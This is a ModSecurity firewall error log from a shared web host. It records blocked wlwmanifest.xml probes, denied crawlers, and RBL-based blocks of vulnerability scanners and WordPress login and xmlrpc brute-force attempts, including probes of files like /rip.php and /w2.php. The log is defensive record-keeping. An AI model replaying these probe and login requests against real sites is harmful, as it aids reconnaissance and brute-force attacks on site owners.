[Tue May 26 14:58:21.325788 2026] [security2:error] [pid 662057:tid 662230] [client 45.154.98.38:63605] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVntfT3lMm9tGFVg9RWuwAAATU"]
[Tue May 26 14:58:21.616036 2026] [security2:error] [pid 662057:tid 662276] [client 45.154.98.38:63795] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVntfT3lMm9tGFVg9RWvgAAAWM"]
[Tue May 26 14:58:21.925016 2026] [security2:error] [pid 658374:tid 658580] [client 45.154.98.38:64125] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVntZ1Mb7_aby-E0KdBNQAAAEw"]
[Tue May 26 14:58:22.140744 2026] [security2:error] [pid 662057:tid 662300] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVntfT3lMm9tGFVg9RWwAAAAXs"]
[Tue May 26 14:58:22.231880 2026] [security2:error] [pid 658374:tid 658596] [client 45.154.98.38:64397] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahVntp1Mb7_aby-E0KdBOQAAAFw"]
[Tue May 26 14:58:22.522346 2026] [security2:error] [pid 662057:tid 662297] [client 45.154.98.38:64695] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVntvT3lMm9tGFVg9RWwQAAAXg"]
[Tue May 26 14:58:22.749178 2026] [security2:error] [pid 662057:tid 662311] [client 47.128.34.158:44604] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/robots.txt"] [unique_id "ahVntvT3lMm9tGFVg9RWxAAAAYY"]
[Tue May 26 14:58:22.819955 2026] [security2:error] [pid 658374:tid 658616] [client 45.154.98.38:65000] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVntp1Mb7_aby-E0KdBQQAAAHA"]
[Tue May 26 14:58:23.109714 2026] [security2:error] [pid 662057:tid 662196] [client 45.154.98.38:65302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVnt_T3lMm9tGFVg9RWxgAAARM"]
[Tue May 26 14:58:23.398470 2026] [security2:error] [pid 658374:tid 658565] [client 45.154.98.38:49177] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVnt51Mb7_aby-E0KdBRwAAAD0"]
[Tue May 26 14:58:23.690061 2026] [security2:error] [pid 658374:tid 658582] [client 45.154.98.38:49407] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVnt51Mb7_aby-E0KdBTAAAAE4"]
[Tue May 26 14:58:24.443770 2026] [security2:error] [pid 658374:tid 658603] [client 185.191.171.7:25392] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahVnuJ1Mb7_aby-E0KdBWAAAAGM"]
[Tue May 26 14:58:24.443901 2026] [security2:error] [pid 658374:tid 658603] [client 185.191.171.7:25392] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahVnuJ1Mb7_aby-E0KdBWAAAAGM"]
[Tue May 26 14:58:24.608192 2026] [security2:error] [pid 658374:tid 658611] [client 20.104.227.76:41926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.gldmarsa.com"] [uri "/rip.php"] [unique_id "ahVnuJ1Mb7_aby-E0KdBYAAAAGs"]
[Tue May 26 14:58:25.148677 2026] [security2:error] [pid 658374:tid 658401] [remote 74.7.241.58:35082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVnuZ1Mb7_aby-E0KdBcAAACxo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:58:25.239456 2026] [security2:error] [pid 658374:tid 658504] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnuJ1Mb7_aby-E0KdBYgAAAAA"]
[Tue May 26 14:58:27.222209 2026] [security2:error] [pid 662057:tid 662274] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnuvT3lMm9tGFVg9RW1AAAAWE"]
[Tue May 26 14:58:27.232248 2026] [security2:error] [pid 658374:tid 658565] [client 146.174.160.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnup1Mb7_aby-E0KdBjQAAAD0"]
[Tue May 26 14:58:27.666676 2026] [security2:error] [pid 658374:tid 658418] [remote 103.11.102.106:53200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVnu51Mb7_aby-E0KdBlwAAbis"]
[Tue May 26 14:58:28.821139 2026] [security2:error] [pid 658374:tid 658521] [client 154.161.32.97:47148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnvJ1Mb7_aby-E0KdBpQAAABE"]
[Tue May 26 14:58:28.828678 2026] [security2:error] [pid 658374:tid 658521] [client 154.161.32.97:47148] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnvJ1Mb7_aby-E0KdBpQAAABE"]
[Tue May 26 14:58:29.482078 2026] [security2:error] [pid 662057:tid 662292] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnvfT3lMm9tGFVg9RW7AAAAXM"]
[Tue May 26 14:58:31.732374 2026] [security2:error] [pid 658374:tid 658512] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnv51Mb7_aby-E0KdB4QAAAAg"]
[Tue May 26 14:58:32.463286 2026] [security2:error] [pid 658374:tid 658443] [remote 84.247.181.196:56852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVnwJ1Mb7_aby-E0KdB9QAAb0Q"]
[Tue May 26 14:58:33.465632 2026] [security2:error] [pid 658374:tid 658581] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnwZ1Mb7_aby-E0KdB_wAAAE0"]
[Tue May 26 14:58:35.512349 2026] [security2:error] [pid 662057:tid 662274] [client 36.37.209.184:63870] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVnwfT3lMm9tGFVg9RXFwAAAWE"]
[Tue May 26 14:58:36.215808 2026] [security2:error] [pid 658374:tid 658504] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnw51Mb7_aby-E0KdCMwAAAAA"]
[Tue May 26 14:58:36.517442 2026] [security2:error] [pid 662057:tid 662191] [client 36.37.209.184:62494] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVnxPT3lMm9tGFVg9RXJwAAAQ4"]
[Tue May 26 14:58:36.561385 2026] [security2:error] [pid 662057:tid 662268] [client 31.57.184.107:59539] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "services.bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVnxPT3lMm9tGFVg9RXMgAAAVs"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 14:58:37.721997 2026] [security2:error] [pid 662057:tid 662198] [client 36.37.209.184:61988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVnxfT3lMm9tGFVg9RXSwAAARU"]
[Tue May 26 14:58:38.463941 2026] [security2:error] [pid 662057:tid 662283] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnxvT3lMm9tGFVg9RXUQAAAWo"]
[Tue May 26 14:58:38.479843 2026] [security2:error] [pid 662057:tid 662244] [client 36.37.209.184:53381] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVnxvT3lMm9tGFVg9RXVwAAAUM"]
[Tue May 26 14:58:39.771220 2026] [security2:error] [pid 662057:tid 662190] [client 31.57.184.107:61833] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "services.bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVnx_T3lMm9tGFVg9RXbQAAAQ0"], referer: https://www.google.com/
[Tue May 26 14:58:40.664128 2026] [security2:error] [pid 658374:tid 658613] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnyJ1Mb7_aby-E0KdCbgAAAG0"]
[Tue May 26 14:58:42.829161 2026] [security2:error] [pid 658374:tid 658618] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnyp1Mb7_aby-E0KdCkwAAAHI"]
[Tue May 26 14:58:44.077243 2026] [security2:error] [pid 662057:tid 662168] [remote 65.2.90.30:33972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVny_T3lMm9tGFVg9RXlwABMW4"]
[Tue May 26 14:58:45.154913 2026] [security2:error] [pid 658374:tid 658573] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnzJ1Mb7_aby-E0KdCwAAAAEU"]
[Tue May 26 14:58:47.458465 2026] [security2:error] [pid 662057:tid 662314] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnz_T3lMm9tGFVg9RXuQAAAYk"]
[Tue May 26 14:58:48.633662 2026] [security2:error] [pid 658374:tid 658455] [remote 92.117.185.70:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVn0J1Mb7_aby-E0KdDCQAAK1A"]
[Tue May 26 14:58:49.692950 2026] [security2:error] [pid 658374:tid 658587] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn0Z1Mb7_aby-E0KdDGwAAAFM"]
[Tue May 26 14:58:52.060063 2026] [security2:error] [pid 658374:tid 658594] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn051Mb7_aby-E0KdDRgAAAFo"]
[Tue May 26 14:58:53.231562 2026] [security2:error] [pid 662057:tid 662176] [remote 57.141.2.47:61202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVn1fT3lMm9tGFVg9RX7gABVHY"]
[Tue May 26 14:58:53.282223 2026] [security2:error] [pid 658374:tid 658571] [client 114.119.150.168:25639] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVn1Z1Mb7_aby-E0KdDbQAAAEM"], referer: http://glorodavionics.com/index.php?route=product%2Fproduct&path=72_25_106&product_id=75
[Tue May 26 14:58:53.690484 2026] [security2:error] [pid 658374:tid 658609] [client 192.178.8.100:44713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVn1Z1Mb7_aby-E0KdDegAAAGk"]
[Tue May 26 14:58:54.368200 2026] [security2:error] [pid 658374:tid 658532] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn1Z1Mb7_aby-E0KdDgQAAABw"]
[Tue May 26 14:58:54.601703 2026] [security2:error] [pid 662057:tid 662300] [client 185.121.232.229:64757] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.121.232.229" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVn1vT3lMm9tGFVg9RYAwAAAXs"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:58:54.601820 2026] [security2:error] [pid 662057:tid 662300] [client 185.121.232.229:64757] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVn1vT3lMm9tGFVg9RYAwAAAXs"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:58:56.061438 2026] [security2:error] [pid 658374:tid 658597] [client 114.119.140.56:50929] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/php/servicios/plenitud-dia-2/"] [unique_id "ahVn2J1Mb7_aby-E0KdDpAAAAF0"], referer: https://www.plenitudotonal.com/php/blog/author/admon/
[Tue May 26 14:58:56.635147 2026] [security2:error] [pid 662057:tid 662268] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn2PT3lMm9tGFVg9RYHAAAAVs"]
[Tue May 26 14:58:56.649889 2026] [security2:error] [pid 658374:tid 658506] [client 154.161.32.97:47149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVn2J1Mb7_aby-E0KdDrQAAAAI"]
[Tue May 26 14:58:56.650002 2026] [security2:error] [pid 658374:tid 658506] [client 154.161.32.97:47149] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVn2J1Mb7_aby-E0KdDrQAAAAI"]
[Tue May 26 14:58:58.880827 2026] [security2:error] [pid 662057:tid 662201] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn2vT3lMm9tGFVg9RYPwAAARg"]
[Tue May 26 14:58:59.069568 2026] [security2:error] [pid 658374:tid 658563] [client 143.0.246.119:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn2p1Mb7_aby-E0KdD3wAAADs"]
[Tue May 26 14:59:00.473075 2026] [security2:error] [pid 662057:tid 662290] [client 172.86.66.156:63406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVn3PT3lMm9tGFVg9RYWAAAAXE"], referer: https://www.cagmedya.com/malatya-web-tasarim/
[Tue May 26 14:59:00.473248 2026] [security2:error] [pid 662057:tid 662290] [client 172.86.66.156:63406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVn3PT3lMm9tGFVg9RYWAAAAXE"], referer: https://www.cagmedya.com/malatya-web-tasarim/
[Tue May 26 14:59:00.704787 2026] [security2:error] [pid 658374:tid 658585] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn3J1Mb7_aby-E0KdEFwAAAFE"]
[Tue May 26 14:59:01.612151 2026] [security2:error] [pid 662057:tid 662246] [client 3.77.67.4:43652] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVn3fT3lMm9tGFVg9RYXwAAAUU"], referer: https://thegoodsporting.com
[Tue May 26 14:59:01.714542 2026] [security2:error] [pid 658374:tid 658553] [client 46.8.222.237:52017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.222.8.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVn3Z1Mb7_aby-E0KdELwAAADE"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:59:01.714712 2026] [security2:error] [pid 658374:tid 658553] [client 46.8.222.237:52017] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVn3Z1Mb7_aby-E0KdELwAAADE"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:59:03.179416 2026] [security2:error] [pid 662057:tid 662262] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn3vT3lMm9tGFVg9RYgwAAAVU"]
[Tue May 26 14:59:03.592008 2026] [security2:error] [pid 658374:tid 658515] [client 154.161.32.97:57082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVn351Mb7_aby-E0KdEWgAAAAs"]
